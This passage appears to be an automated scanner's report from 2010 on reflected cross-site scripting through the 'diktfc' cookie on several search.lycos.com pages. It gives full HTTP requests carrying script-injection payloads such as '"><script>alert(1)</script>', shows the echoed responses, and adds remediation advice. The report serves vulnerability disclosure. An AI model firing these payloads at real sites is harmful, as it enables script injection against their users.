GET /default.asp HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A599d1"><script>alert(1)</script>8a2ede2f521; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17165
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=search.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A599d1"><script>alert(1)</script>8a2ede2f521.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2feaa"%3balert(1)//caad74f47b6 was submitted in the diktfc cookie. This input was echoed as 2feaa";alert(1)//caad74f47b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.asp HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2feaa"%3balert(1)//caad74f47b6; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:14 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17135
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1517b"><script>alert(1)</script>026051adaf3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /image/ HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1517b"><script>alert(1)</script>026051adaf3; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=search.lycos.com/image/&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1517b"><script>alert(1)</script>026051adaf3.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3332c"%3balert(1)//d09a29f118f was submitted in the diktfc cookie. This input was echoed as 3332c";alert(1)//d09a29f118f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /image/ HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3332c"%3balert(1)//d09a29f118f; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17319
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e92cb"><script>alert(1)</script>2113f4c409d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /video/ HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae92cb"><script>alert(1)</script>2113f4c409d; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:06 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=search.lycos.com/video/&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae92cb"><script>alert(1)</script>2113f4c409d.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 184a0"%3balert(1)//a41b54937a was submitted in the diktfc cookie. This input was echoed as 184a0";alert(1)//a41b54937a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/ HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A184a0"%3balert(1)//a41b54937a; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17323